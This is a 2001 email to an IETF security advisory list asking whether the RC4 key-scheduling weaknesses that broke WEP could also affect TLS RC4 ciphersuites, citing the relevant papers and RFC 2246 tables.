From: Jeff.Hodges@kingsmountain.com
Sent: Tuesday, August 07, 2001 4:43 PM
To: Security Area Advisory Group
Cc: Jeff.Hodges@kingsmountain.com
Subject: [saag] RC4 insecurity wrt SSL/TLS?

A question for those who've read and grokked the first paper below...

given..

  Weaknesses in the Key Scheduling Algorithm of RC4
  http://www.eyetap.org/~rguerra/toronto2001/rc4_ksaproc.pdf

  Using the Fluhrer, Mantin, and Shamir Attack to Break WEP
  http://www.cs.rice.edu/~astubble/wep/


..and this from http://www.ietf.org/rfc/rfc2246.txt ...


  C. CipherSuite definitions
                  .
                  .
  TLS_RSA_WITH_RC4_128_MD5                RSA            RC4_128      MD5
  TLS_RSA_WITH_RC4_128_SHA                RSA            RC4_128      SHA
                  .
                  .
                  .
                        Key      Expanded   Effective   IV    Block
    Cipher       Type  Material Key Material  Key Bits  Size   Size
                  .
                  .
    RC4_128      Stream  16         16         128        0     N/A
                  .
                  .


Is it thus possible for conformant TLS implementations to use similar-to-WEP 
RC4 initializations such that their operational use of RC4 as the TLS stream 
cipher is similarly vulnerable?

An additional question is whether typical RC4 implementations-and-APIs give 
the programmer enough lattitude to step into the vulnerable-like-WEP mudpuddle?

thanks,

JeffH